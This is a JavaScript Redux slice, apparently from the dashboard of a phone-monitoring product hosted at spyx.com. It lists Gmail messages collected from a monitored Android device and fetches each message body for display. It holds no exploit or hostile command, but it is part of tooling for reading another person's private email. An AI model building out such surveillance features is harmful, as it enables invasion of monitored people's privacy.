// ** Redux Imports
import { createSlice, createAsyncThunk } from '@reduxjs/toolkit'

import axios from 'axios'

import { getGcloudAll } from 'src/@api/dashboard'
import { selectDeviceContext, selectDeviceRequestKey } from 'src/store/apps/Common'
import { addDeviceSwitchReset } from 'src/store/apps/deviceSwitchHandlers'

const PAGE_SIZE = 50

const createInitialState = () => ({
  allEmails: [],
  mails: [],
  androidMails: [],
  selectedMails: {
    title: '',
    fromName: '',
    toName: '',
    time: '',
    content: ''
  },
  total: 0,
  pageSize: PAGE_SIZE,
  loading: true,
  deviceRequestKey: '',
  activeListRequestId: '',
  activeDetailRequestId: ''
})

const fetchMailsRequest = createAsyncThunk(
  'androidEmail/fetchMails',
  async ({ page, pageSize, requestKey, context }, { signal }) => {
    const limit = pageSize || PAGE_SIZE
    const response = await getGcloudAll(
      {
        username: context?.username || '',
        params: {
          category: 'GMAIL',
          offset: (page - 1) * limit,
          limit,
          ...(context?.physicalDeviceKey ? { deviceUdid: context.physicalDeviceKey } : {})
        }
      },
      { signal }
    )

    return {
      data: [...(response.data.contents || [])].sort((a, b) => b.time - a.time),
      total: response.data.totalCount || 0,
      page,
      pageSize: limit,
      requestKey
    }
  }
)

export const fetchMails = (page, pageSize = PAGE_SIZE) => (dispatch, getState) => {
  const state = getState()

  return dispatch(
    fetchMailsRequest({
      page,
      pageSize,
      requestKey: selectDeviceRequestKey(state),
      context: selectDeviceContext(state)
    })
  )
}

const fetchSelectedMailsRequest = createAsyncThunk(
  'androidEmail/fetchSelectedMails',
  async ({ params, requestKey, username }, { signal }) => {
    try {
      const response = await axios.get(`https://cos.spyx.com/${params.url}`, { signal })

      return {
        title: params.title,
        fromName: params.source,
        toName: username,
        time: params.time,
        content: response.data,
        requestKey
      }
    } catch (error) {
      if (error?.code === 'ERR_CANCELED') throw error

      return {
        title: 'Not Found',
        fromName: params.source,
        toName: username,
        time: new Date(),
        content: <p>Not Found</p>,
        requestKey
      }
    }
  }
)

export const fetchSelectedMails = params => (dispatch, getState) => {
  const state = getState()
  const context = selectDeviceContext(state)

  return dispatch(
    fetchSelectedMailsRequest({
      params,
      requestKey: selectDeviceRequestKey(state),
      username: context?.username || ''
    })
  )
}

export const androidEmail = createSlice({
  name: 'AndroidEmail',
  initialState: createInitialState(),
  reducers: {},
  extraReducers: builder => {
    addDeviceSwitchReset(builder, createInitialState)

    builder.addCase(fetchMailsRequest.pending, (state, action) => {
      state.loading = true
      state.deviceRequestKey = action.meta.arg.requestKey
      state.activeListRequestId = action.meta.requestId

      // 保留当前列表直到新请求完成，避免切换每页条数时短暂渲染「No Mails Found」。
      // fulfilled 中会以新 pageSize 的结果一次性替换数据。
    })
    builder.addCase(fetchMailsRequest.fulfilled, (state, action) => {
      if (
        state.deviceRequestKey !== action.meta.arg.requestKey ||
        state.activeListRequestId !== action.meta.requestId
      ) return

      state.mails = action.payload.data
      state.allEmails = action.payload.page === 1
        ? action.payload.data
        : [...state.allEmails, ...action.payload.data]
      state.total = action.payload.total
      state.pageSize = action.payload.pageSize
      state.loading = false
    })
    builder.addCase(fetchMailsRequest.rejected, (state, action) => {
      if (
        state.deviceRequestKey === action.meta.arg.requestKey &&
        state.activeListRequestId === action.meta.requestId
      ) state.loading = false
    })
    builder.addCase(fetchSelectedMailsRequest.pending, (state, action) => {
      state.deviceRequestKey = action.meta.arg.requestKey
      state.activeDetailRequestId = action.meta.requestId
    })
    builder.addCase(fetchSelectedMailsRequest.fulfilled, (state, action) => {
      if (
        state.deviceRequestKey === action.meta.arg.requestKey &&
        state.activeDetailRequestId === action.meta.requestId
      ) state.selectedMails = action.payload
    })
  }
})

export default androidEmail.reducer
